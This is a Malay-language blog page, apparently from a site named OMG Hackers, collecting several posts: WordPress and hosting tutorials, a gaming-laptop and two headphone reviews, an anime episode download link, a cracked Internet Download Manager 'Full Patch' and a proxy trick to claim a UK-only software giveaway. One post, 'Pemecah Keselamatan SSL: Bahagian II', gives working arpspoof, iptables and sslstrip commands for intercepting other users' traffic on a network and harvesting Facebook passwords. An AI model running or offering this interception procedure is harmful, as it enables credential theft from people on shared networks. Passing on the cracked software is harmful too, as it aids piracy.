Utama Blog Laman 256

Belajar WordPress 4: Membina Blog Dengan Hosting

0

Assalamualaikum dan selamat sejahtera.

Kita teruskan kepada tujuan kita selepas berjaya memuat naik fail wordpress ke hosting. Jangan tunggu lama-lama nanti orang lain yang akan pasangkan untuk anda.

Langkah 1: Selepas selesai memuat naik fail wordpress klik link laman/blog anda pada cPanel atau kunjungi laman anda.

Langkah 2: Anda akan disambut dengan antaramuka pertama seperti ini.



Langkah 3: Masukkan data peribadi anda pada ruangan yang disediakan. Klik Install WordPress.

Langkah 4: Akaun wordpress anda sudah bersedia untuk digunakan. Klik log In untuk ke log masuk dan ubahsuai apa yang perlu.

Sementara menunggu entri keselamatan/sekuriti wordpress anda boleh carinya pada google.com.my
Sekian,Assalamualaikum

Views: 0

Iklan Newspaper Inline

Kamen Rider Wizard Episode 1 Download!

0

Epic! Itulah yang mampu saya katakan mengenai siri terbaru Kamen Rider yang baru disiarkan dan diberi nama sebagai Kamen Rider Wizard, selepas tamatnya siri Kamen Rider Fourze. Dengan tersiarnya episod pertama siri ini, Kamen Rider Wizard dikatakan bakal menjadi successor kepada siri Fourze.

Tak perlu berbicara panjang, kalau nak baca intro anda boleh baca di sini.

Mahu tonton episod 1 yang epik ini?
Anda boleh muat turun video tersebut di sini : Kamen Rider Wizard Episode 1

Jangan lupa berikan komen selepas menonton! Jyeah!

Pautan Muat Turun Alternatif (English Hardsub):

Minus.com

Sumber : Over-Time

Views: 2

Iklan Newspaper Inline

Razer Blade (Gaming Laptop)

0

Salam semua…

Hai kali nie saya nak share laptop gaming yang saya baru “terlihat” di internet dan terdetik di hati ini ingin berkongsi dengan korang semua…Walapun dah ada yang tahu tentang laptop nie especially gamers!

Ok bila dengar je laptop gaming..mesti korang bayangkan laptop tu mesti HIGH SPECT…yup memang betul laptop nie mempunyai spect yang tinggi. Rupa parasnya? Seperti yang korang biasa lihat mesti tebal-tebal kan..
Saya ambil contoh laptop gaming yang familiar di Malaysia sekarang ialah Alienware dicipta oleh Dell. Iainta berat dan tebal… agak tak portable…(my humble opnion)…
Alienware M17x 3D Gaming Laptop

Ok pernah dengar Macbook? Iaitu laptop dari syarikat Apple Inc. Adakah iainy gaming laptop? Owh tidak… biasanya laptop dari Apple nie orang lebih suka menggunakannya untuk kerja-kerja multimedia… Apa yang korang dapat bayangkan untuk Macbook? Yup semestinya iainya NIPIS tapi tak sesuai sangat untuk gaming…

MacBook Pro. 13- and 15-inch.

Tetapi tidak untuk Razer Blade (da macam promote la plak)… Iainya bagi pendapat saya adalah sebuah laptop gaming diibaratkan Alienware + Macbook = Razer Blade. Yups..kerana ianya amat NIPIS seperti macbook dan POWER seperti Alienware…

Mari kita tengok dari segi perfomance

 

Laptop nie menggunakan processor yang terkini iaitu Intel® Core™ i7 quad-core processor dan menggunakan grafik card NVIDIA® GeForce™ GTX series serta digabungkan dengan skrin LED 17.3″ untuk membuatkan anda lebih teruja ketika bermain game..

Yang kedua membuatkan saya teruja tentang laptop nie adalah ciri luaran nya yang NIPIS dan ringan membuatkan iannya menjadi sangat portable…

Dan yang terakhir sekali membuatnya berbeza dan lain dari yang lain iainya mempunyai Switchblade UI. Apa benda tu? Ok mari saya terangkan iainya sejenis button yang mempunyai user intreface memboleh user berinteraksi denggannya dengan mudah dan boleh berubah-rubah mengikut pengguna itu sendiri.

Contohnya jika user tu bermain game World of Worldcraft, user tersebut boleh mengubahnya kepada item dan skill di situ dan secara tak langsung membuatkan iainya menjadi shorcut button untuk game tersebut dan begitulah jika bermain game lumba seperti need for speed dan sebagainya…Memang cool gila la weh…

Untuk tahu lebih lanjut tentang Switchblade UI nie boleh berkunjung di sini
Tak puas lagi? Ok nie spect dia :-

Untuk lihat benchmark dia korang boleh tengok kat sini

 

Harga : RM 7820 (Bila la nak dapat) Jika berminat boleh la beli kat sini

Ok itu sajalah “promosi” saya untuk laptop nie…Akhir kata dari saya setiap orang berbeza pendapat…Tapi jangan jadikan perbezaan itu menjadi penghalang untuk bermain GAME bersama…

Sekian…

Sumber Gambar dan Spect

Views: 0

Iklan Newspaper Inline

Internet Download Manager 6.12 Build 12 Final Full Patch

0
Salam saya ucapkan kepada semua pembaca setia OMG Hackers…
Seperti biasalah IDM mengeluarkan lagi version terbarunya. Tapi kali nie tak banyak berubah berbanding yang version 6.12 Build 10.. Untuk rilisan kali nie hanyalah mereka fix bug sahaja…

Download Here

Views: 6

Iklan Newspaper Inline

Beats by Dr. Dre UrBeats In-Ear Headphone Review

0

Assalamualaikum.

Masih lagi berkisar mengenai headphone, kali ini saya ingin menulis mengenai UrBeats In-Ear Headphone, produk dari Beats by Dr. Dre. Ya, ia tidak digelar sebagai earphone, tetapi in-ear headphone.

Secara jujurnya, ini ialah produk dari Beats by Dr. Dre terbaik yang pernah saya gunakan. Produk lain seperti Beats Solo dan Beats Solo HD tidak mampu memenuhi ‘standard level’ yang telinga saya boleh terima. Antara keduanya terdapat beberapa kelemahan seperti perincian bass yang lemah dan terdapat beberapa instrument yang tidak kedengaran dengan jelas.

Tetapi UrBeats berjaya memuaskan hati saya meskipun ia cuma berbentuk kecil dan tidak begitu menonjol. Bunyi yang dijana agak bagus, kerana bass tidak begitu berlebihan sehingga menjejaskan kualiti bunyi instrumen yang lain ataupun memendapkan treble. Sederhana, tetapi berkualiti.

Walaupun masih ada instrumen yang tidak dapat didengari dengan baik, UrBeats berjaya memperincikan instrumen-instrumen yang lain. Muzik yang kita mahu dengar dapat dirasai apa yang cuba disampaikan, kerana sepertimana yang kita tahu, pemuzik bekerja keras dalam studio untuk memastikan kita mendengar bunyi yang terbaik. UrBeats ternyata tidak menghampakan.

Di dalam kotak turut disediakan beberapa ear buds tambahan, untuk saiz telinga atau kemahuan yang berbeza. Tak lupa juga terdapat sticker dengan logo Beats, serta buku manual dan maklumat mengenai produk Beats by Dr. Dre dan juga beg kecil untuk kita menyimpan earphone ini supaya mudah dapat dibawa ke mana-mana. Pada wayarnya terdapat ControlTalk oleh Monster, khusus untuk telefon bimbit HTC.

Reka Bentuk : 8.0 (Tulisan pada earphone tersebut mudah tanggal, jadi saya tolak markah untuk kelemahan itu)
Material : 8.0
Aksesori : 8.0
Penampilan Kotak : 9.0 (Menggunakan konsep bukaan buku, sama seperti kotak Beats by Dr. Dre yang lain dan dibuat dengan tampilan profesional)
Kualiti Audio : 8.5
Nilai Belian : 8.5
Harga : RM320 (Harga ini adalah pada waktu mula-mula saya membelinya dahulu. Sekarang sudah turun kepada RM199 atau lebih sedikit mengikut tempat dan promosi)

Views: 1

Iklan Newspaper Inline

Noontec Zoro Headphone Review

0

Assalamualaikum.

Buat para peminat muzik sekalian, rasanya ini adalah masanya untuk anda penuhkan keinginan anda sebagai seorang yang sentiasa menginginkan bunyi terbaik dari sebuah headphone dengan mendapatkan model Noontec Zoro.

Saya tahu mengenai headphone ini pun secara kebetulan, apabila saya pergi ke sebuah pusat beli-belah untuk mencari model terbaru Beats by Dr. Dre Solo HD (versi 2012, tanpa Monster branding). Jadi niat asalnya adalah untuk menguji kualiti bunyi dari model terbaru tersebut. Tidak disangka pula boleh ‘tersangkut’ dengan model dari Noontec ini. Kalau hendak diikutkan dari segi bahasa inggeris memang tidak jauh antara ‘Zoro’ dan ‘Solo’, jadi saya tidak terasa seperti ‘kerugian’ di situ.

Reka Bentuk

Jika dilihat dari sudut reka bentuk (design), Noontec Zoro dengan jelas menginspirasikan Beats Solo HD! Oh ya, bagi saya tidak salah menginspirasikan sesuatu dan mencipta sesuatu berdasarkan kepadanya, yang pasti Noontec Zoro bukan versi rip off. Ada beza yang ketara antara ‘diinspirasikan dari’ dengan ‘diciplak’.

Headphone ini boleh dilipat ke dalam, dan boleh disimpan di dalam beg yang disediakan. Selain itu, wayar yang dibekalkan juga bukan dari jenis bersambung terus pada headphone, kerana ia boleh ditanggalkan pada bila-bila masa dan boleh digantikan dengan wayar alternatif yang lebih berkualiti mengikut kemahuan anda.

Eh, pendek kata ciri yang ada padanya memang seperti Beats by Dr. Dre Solo HD! Senang faham kan! Cuba lihat pada gambar-gambar di bawah:

Apa yang seronok, bukan sahaja ia mengambil reka bentuk Solo HD sebagai sandaran, tetapi kata-kata intro dari laman webnya juga seakan kata-kata dari Dr. Dre:

While recording music, artists put a great deal of effort into perfecting every detail. However, people may lose a lot of detail and finesse when using the common pair of earphones, and thus they are not able to enjoy the perfect sound effects created by the music and the optimum quality of music is lost.

Berikut pula quote dari kata-kata Dr. Dre yang dicetak pada kotak produk Beats by Dr. Dre:

Artists and producers work hard in the studio, perfecting their sound. But people never really hear it with normal headphones. Most headphones can’t handle the bass, the detail the dynamics. With Beats, people are going to hear what the artists hear and listen to the music the way they should: the way I do.

Rasanya bukan saya seorang sahaja yang berperasaan begitu bukan?

Kualiti Audio

Namun sepertimana yang saya katakan sebentar tadi, kualiti bunyi yang dijana oleh Noontec Zoro ternyata melangkaui Solo HD, dengan harga yang jauh lebih murah. Saya terus lupakan niat mencari versi terbaru Solo HD dan terus mencuba lagu-lagu yang tersimpan dalam telefon saya. Begitu bagus sekali bunyi yang dikeluarkan.

Apabila saya mencuba beberapa lagu ujian dalam genre yang berbeza seperti lagu Too Phat – Clap To This, Sil Khannaz – Hakikat dan Seru, Cromok – Memories, Cannibal Corpse – Decency Defied, Six Feet Under – Revenge of The Zombie dan juga beberapa lagi lagu techno, jazz serta instrumental, saya boleh katakan ia melepasi paras standard yang saya tetapkan. Ternyata Noontec Zoro berprestasi lebih dari harga yang ditawarkan, serta lebih berkualiti berbanding Beats Solo HD! Muzik yang saya minat memang lebih cenderung kepada Metal dan Hip-Hop, kerana itulah senarai lagu ujian lebih kepada genre Metal.

Janaan bunyi bass, perincian yang diberikan adalah berkualiti tinggi, tanpa melebihi dari yang sepatutnya, tidak pula terasa kurang, dan anda masih boleh dapat merasakan ‘tapping’ pada telinga apabila bunyi bass dikeluarkan. Disebabkan saya mengujinya di kedai, saya hanya sempat melakukan ujian pada HTC One X yang dikuasakan oleh Beats Audio, yang mana Beats Audio itu telah dimodifikasi supaya menjana audio lebih berkualiti dari standard Dr. Dre (hahah! saya cuma flashed modifikasi sahaja, bukan saya yang modifikasinya ok!).

Janaan bunyi treble memang jelas, tetapi mungkin kerana Beats Audio yang telah dimodifikasi ini menyebabkan ia sedikit terlebih jelas. Jika treble diturunkan sedikit, maka bunyinya akan lebih harmoni. Apabila volume dikuatkan, distorsi tidak beberapa dirasai, tetapi seperti yang saya katakan, akibat modifikasi Beats Audio menjadikan ia sedikit nyaring. Jika didengar melalui peranti lain, saya pasti bunyinya lebih baik (heheh..).

Noise cancelling pada headphone ini tidak seperti yang diharapkan. Jika anda mendengar ia pada persekitaran yang hingar-bingar, mungkin tiada masalah. Tetapi jika anda cuba mendengar muzik pada persekitaran senyap seperti perpustakaan, mungkin akan mengganggu individu-individu yang lain.

Perkara yang saya tidak beberapa gemar ialah wayar yang dibekalkan walaupun tangle-free, tetapi ia agak nipis dan tampak seperti agak mudah untuk diputuskan, selain ia tidak mempunyai alat kawalan untuk muzik. Ahhh, nampaknya itu sahajalah rungutan saya terhadap headphone ini. Selain dari masalah wayar dan fungsi noise cancelling, masalah lain memang tiada.

Apapun saya boleh jamin ia memang tidak menghampakan, dan berbaloi sekali dengan harganya. Untuk reviu yang lebih profesional, sila ke inner|fidelity. InsyaAllah di waktu akan datang reviu saya akan lebih profesional lagi sepertimana laman tersebut (masih belajar cara pengukuran kualiti sesebuah headphone).

Jumpa lagi semua!

Reka Bentuk : 9.0
Material : 8.0
Aksesori : 7.0 (Tiada kain pengelap untuk membersihkan headphone, dan beg yang disertakan agak ringkas berbanding yang dibekalkan oleh produk Beats by Dr. Dre)
Penampilan Kotak : 9.0 (Menggunakan konsep bukaan buku, sama seperti kotak Beats by Dr. Dre)
Kualiti Audio : 8.9 (Agak tinggi bukan? Sebab saya memang puas hati dengannya.)
Nilai Belian : 9.0
Harga : RM170 (Mungkin berbeza mengikut tempat atau promosi)

Views: 2

Iklan Newspaper Inline

Pemecah Keselamatan SSL : Bahagian II

0

Salam dan selamat sejahtera, Ok, kali ini kita akan meneruskan
pembelajaran terdahulu. Setelah artikel bahagian pertama, th3bAdh mengambil
masa yang panjang untuk menyambungkan artikel tersebut kerana terdapat masalah/
hal-hal dunia yang lain, walaubagaimana pun,  Seperti yang dijanjikan, th3bAdh akan
menceritakan penggunaan sslsniff bagi menggodam pengguna  facebook yang terdapat pada rangkaian sendiri
sahaja . Perhatian ! Segala penerangan dan penulisan disini adalah bagi tujuan
pembelajaran sahaja, dan saya tidak akan bertanggungjawab atas apa yang berlaku
kepada anda. Tak nak cakap membebel-bebel dah, mana yang masih tak tahu, sila
baca artikel bahagian I terlebih dahulu
Langkah : Buka terminal dan taip

echo 1 > /proc/sys/net/ipv4/ip_forward

Taip : arpspoof -i wlan0 –t

arpspoof –i wlan0 192.168.1.5

Penerangan : arpspoof –i wlan0 192.168.1.5
-i :adalah interface anda, sekiranya anda tidak pasti, taip
ifconfig untuk kepastian,
192.168.1.5 : adalah alamat IP bagi network gateway,
pastikan alamat gateway anda tepat bagi mengalih data –data trafik, pastikan
ianya betul,(sekiranya tersilap, ianya tidak akan menjadi)
Tambahan : sekiranya anda mahu menyerang pada komputer yang
hendak diserang sahaja, tambahkan baris perintah –t sebelum alamat IP gateway,
contoh :
Arpspoof –i wlan0 –t 192.168.1.12 192.168.1.5
Selepas dimasukkan baris perintah diatas, biarkan ianya
berjalan (tidak perlu ditutup)
 Kita beralih langkah seterusnya, buka terminal baru dan taip

iptables -t nat -A PREROUTING -p tcp –destination-port 80
-j REDIRECT –to-ports 10000

Tanpa perlu menutup terminal tadi, taipkan

 python
/pentest/web/sslstrip.py –w ssl

Penerangan selepas baris perintah –w : anda boleh menamakan
apa sahaja nama yang suka, tetapi pastikan ia format text contoh ssl.txt  bagi menyimpan output. Sekiranya telah
berjaya, anda boleh membuka file tersebut di dalam folder
/pentest/web/sslstrip.
Bagi memudahkan pencarian yang terdapat kata laluan anda
boleh mencari kata (Ctrl+F) taip “pass”

Gambar diatas adalah salah satu akaun facebook yang telah
berjaya digodam di dalam sesebuah rangkaian sendiri, ianya tidak dihadkan untuk
memecah facebook sahaja,ianya boleh digunakan untuk memecah kesemua keselamatan
SSL,
Ok itu sahaja lah bagi tutorial kali, bagi tutorial akan
datang th3bAdh akan menulis untuk OS Windows pula (kena tunggu bahagian III),
ada juga  ke bagi windows?? Tunggu
bahagian akan datang, jangan ketinggalan…hahahha

Views: 2

Iklan Newspaper Inline

Belajar WordPress 2: Membina Blog Dengan Hosting.

0

Assamulaikum dan selamat sejahtera.

Bahagian kedua dalam perbincangan “Belajar WordPress”. Tak perlu cerita panjang. Kita teruskan kepada tujuan kita. Sebelum ini kita dah membincangkan tentang domain. Entri kali ini pula membincangkan tentang hosting. Bermula dari pendaftaran sehingga selesai perbincangan mengenai hosting. Tapi sebelum itu mari kita berkenalan dengan apa yang dimaksudkan dengan hosting. Segala tutorial mengenai “Belajar WordPress” ini akan menggunakan 2freehosting sebagai hos kepada pemberlajaran dan pengajaran kita.

Definisi/Apa itu hosting?
Hosting atau dikenali juga sebagai web hosting adalah satu keperluan bagi mereka yang mahukan laman/blog mereka nampak profesional. Jika menggunakan blogger.com ataupun wordpress.com sesuatu laman itu kurang professional kerana tertakluk dengan beberapa syarat yang perlu dipatuhi oleh penggunanya.
Hosting juga boleh diibaratkan sebagai tapak perumahan. Jika domain adalah rumah maka hosting adalah tapak. Masakan pula,bina rumah tanpa tapak. Rumah angkasawan Malaysia pun bertapak.

Kaedah pendaftaran.
Langkah 1: Kunjungi laman 2freehosting disini untuk melakukan pendaftaran.

Langkah 2: Masukkan butir-butir pengenalan diri anda pada ruangan yang disediakan. Lakukan pendaftaran seperti biasa.


Langkah 3: Selepas sahaja anda klik Signup Now! anda akan dibawa ke halaman muka depan cPanel 2freehosting.com seperti cpanel.2freehosting.com/switcher. Tapi anda masih belum dapat menggunakan hosting sepenuhnya. Jadi kunjungi e-mail,log masuk dan lakukan pengaktifan pada link yang diberikan.

Langkah 4: Selepas klik link tersebut anda akan dibenarkan untuk buat satu akaun baru bagi domain anda.

Sub-point.

  1. Pilih Free Hosting atau Premium. Disarankan agar memilih yang percuma.
  2. Disebabkan pada entri Belajar WordPress 1 anda buat domain. Jadi,gunakan domain luar. Klik I want to host my domain. Untuk sepanjang tutorial ini domainnya ialah belajarzwordpress.tk.
  3. Jika anda klik I want to host my domain perkataan subdomain www berubah ke domain www. Ini yang dimaksudkan subdomain boleh jadi dua situasi pada pengenalan cPanel dahulu. Jika anda klik I want…….. maka kotak .3eeweb.com tu akan hilang. (Benda tak penting pun nak bagitahu. Huh!)
  4. Password dan Password again disekalikan/digabungkan/dirapatkan/disendatkan. Masukkanlah apa-apa karakter bagi kata laluan anda disertai dengan huruf kecil dan besar,simbol dan angka. Jika malas klik je Generate password. Pastikan juga kata laluan hosting anda berbeza dengan katalaluan e-mail anda sebagai keselamatan.
  5. dan 6. digabungkan. Masukkan captcha yang tertera. Jika sukar untuk melihat klik Get new words.
  6. Klik Create.
Langkah 5: Selepas anda klik anda sekumpulan ayat yang menyuruh anda menunggu selama 12 jam atau lebih. Jangan percaya itu semua konspirasi. Tunggu beberapa minit lalu kunjungi laman/klik link laman anda anda. untuk mengesahkan link anda sudah boleh digunakan atau tidak. Jika keluar gambar ini atau lain maknanya anda sudah berjaya menggunakan perkhidmatan mereka. (index.html)


Langkah 6: Klik Switch untuk ke muka depan cPanel 2freehosting.com.

Untuk memasang wordpress cara manual akan bersambung pada edisi/versi/bahagian tiga. Sila tunggu dalam slot “Belajar WordPress” yang akan datang.

Views: 1

Iklan Newspaper Inline

Serial Number of Uniblue Driver Scanner 2012 For FREE

0

Assalamualaikum dan selamat sejahtera para pengunjung OMG!!hackers..luqman lama tidak update,luqman kalut dengan peperiksaan yang akan datang..ok!!hari ni luqman nak bagi satu software free yang diberi nama    Uniblue Driver Scanner 2013..lesen nya datang dari ladang(tak main la crack-crack ni)..

Apa yang shoknya software ni..mari kita tengok ciri yang ada pada perisian ini…

What does this software do?

The problem:
Old drivers may cause a range of problems, from diminished hardware functionality to conflicts and system crashes. Although drivers are available for free and can be updated manually, identifying outdated drivers can take a long time. Moreover, pinpointing just the right driver from the manufacturer’s website, downloading and installing it can be laborious and technically risky…

The solution:
Built with simplicity in mind, DriverScanner scans your computer to provide a list of drivers that need to be updated. With single click convenience, DriverScanner will then safely install each update on your PC…

DriverScanner 2013’s new features include:
– 2013 version..
– Fixed scan issue on Windows XP 64 bit machines..
– Available in 13 languages..
– Windows 8 compatible…(siapa yang pakai window 8 boleh la try pakai)..

1.Cara untuk dapatkan giveaway ni,senang ja..giveaway ni berasal dari UK,dan ada perlulah pakai ip UK(dengar kena tukar ip UK xjadi la nak ambik)..jangan risau,kita boleh menggunakan proxy,ini proxynya http://fishproxy.com/..ambik link ni dan https://store.uniblue.com/278/purl-DSpr-rkf?x-source=pr&x-pr=covermount-free&x-covermount-free=webuser_DS letak dekat kotak di fishproxy..

2.Selepas anda letak link 2 dan tekan suft..anda akan dibawa ke laman promosi uniblue..

3.Apa yang dibuat adalah isi butiran anda di bawah dan kilk next..
P/S:jangan segan-segan guna perisian ini..

Views: 0

Iklan Newspaper Inline

Belajar WordPress 1: Membina Blog Dengan Hosting.

0

Assalamualaikum dan selamat sejahtera.

Bermula perbincangan kita tentang memasang wordpress pada hosting. Nak belajar wordpress memang takkan selesai dalam masa sehari atau dalam satu entri sahaja. Jadi pembelajaran ini di akan berterusan sehingga ke akhirnya. Pada bahagian berapa? Masih belum dapat dipastikan lagi. Bukan hanya selepas pasang wordpress boleh terus digunakan. Kena fikir tentang sekuriti lagi,cara mengawal bandwidth dan sebagainya.

Ok. Entri pertama ini dalam segmen/rancangan/slot “Belajar WordPress” akan dimulakan dengan domain. Untuk pengetahuan anda semua. Tajuk akan dikekal seperti di atas sebab wa kurang mahir dalam pembinaan tajuk. Jika anda ada sebarang keraguan pada tajuk. Pastikan anda menghantar sebarang komen atau kutukan di bahagian yang disediakan. Berbalik kepada tujuan kita. Entri pertama Belajar WordPress akan membekalkan kepada anda tentang domain. Domain yang akan digunakan ialah domain percuma dot.tk dan hostingnya adalah daripada 2freehosting.com.

Terpulang kepada anda untuk menggunakan domain apa. Percuma atau berbayar. Yang penting kaedahnya tetap sama. Begitu juga dengan hosting. Gunalah sebarang hosting yang anda yakin akan kestabilan dan kehebatan hosting tersebut. 

Apa itu domain.
– Domain ialah satu kalimat yang dimulakan dengan www atau tanpanya yang disudahi dengan .com,.my,.org,.biz atau sebagainya.
– Tanpa domain anda akan menghafal beberapa angka seperti 

216.239.36.21. Memang bagus untuk daya penghafalan anda. Tetapi jika ada seribu laman/blog yang anda kerap kunjungi,macam mana? Bookmark je tak cukup.

Domain juga dikenali sebagai rumah anda. Sebab itu domain dikenali sebagai alamat. Tanpa alamat tiadalah rumah. Selain daripada rumah,domain juga dikenali sebagai identiti bagi sebuah laman/blog.
Domain perlulah ringkas agar mudah diingati. Lebih mudah jika digunakan oleh orang ramai. Maksudnya macam domain omghackers.com. Sekarang adalah fenomena manusia menggunakan perkataan yang diringkaskan seperti OMG,LOL,ASAP dan sebagainya. Jadi jika disebut banyak kali akan mudah diingati.

Kaedah Pendaftaran
Langkah 1: Kunjungi laman rasmi domain .tk disini.

Langkah 2: Klik Login to My Dot TK 


Langkah 3: Biasakan diri anda dengan Gmail kerana tutorial ini akan menggunakan Gmail. Klik Google untuk dijadikan perantara kerana anda tidak perlu lagi daftar. Rujuk gambar dibawah:

Langkah 4: Akan keluar satu tetingkap untuk mengesahkan akaun gmail anda sebagai pengantara dot.tk.

Langkah 5: Setelah anda selesai mengesahkan akaun Gmail yang akan digunakan untuk menjadi perantara maka tetingkap tadi akan hilang. Kembali kepada tetingkap asal. Anda akan disambut dengan muka depan yang baru. Seperti gambar dibawah.

Langkah 6: Klik go to domain untuk membuat satu domain baru. Rujuk gambar:

Langkah 7: Pastikan domain anda belum wujud. Bandingkan gambar 1 dan 2 dibawah.

Langkah 8: Jika anda mendapat gambar yang kedua. Ikuti langkah dibawah.
  1. Klik Free Domain
  2. Klik Next

Langkah 9: Ikut gambar di bawah:-

Nameserver 2freehosting: ns1.2freehosting.com,ns2.2freehosting.com
Domain anda berjaya dibina.

Selesai Belajar WordPress 1 atau juga boleh dikenali sebagai bab satu.
Sekian,Assalamualaikum

Views: 1

Iklan Newspaper Inline